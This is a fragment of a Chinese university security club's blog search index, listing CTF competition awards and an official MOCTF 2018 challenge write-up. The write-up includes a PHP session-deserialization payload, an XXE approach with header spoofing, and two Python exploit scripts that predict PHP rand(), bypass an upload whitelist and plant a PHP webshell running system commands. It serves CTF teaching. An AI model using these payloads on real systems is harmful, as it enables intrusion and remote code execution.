    \u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n

    360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002

    \u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

    \u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u6bd4\u8d5b\u6d77\u62a5\uff1a

    \u6bd4\u8d5b\u73b0\u573a\uff1a

    \u6bd4\u8d5b\u6392\u884c\u699c\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

    \u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

    \u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

    \u6bd4\u8d5b\u73b0\u573a\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"

    \u6bd4\u8d5b\u89c6\u9891\uff1a

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"

    \u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"

    \u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"

    \u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"
    \u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n

    flag:moctf{500000000}

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"
    \u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

    \u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

    -.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

    \u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
    \u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

    \u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

    <?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

    flag.php

    <?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

    \u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

    ini_set('session.serialize_handler', 'php_binary');\n

    \u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

    $a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
    |O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

    \u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
    \u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

    \u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

    client-ip:localhost\n

    \u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
    \u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

    index.php

    <?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

    \u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

    \u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

    #\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

    put.py

    #\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

    \u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

    ","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

    \u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

    1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
    2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
    3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
    4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
    5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

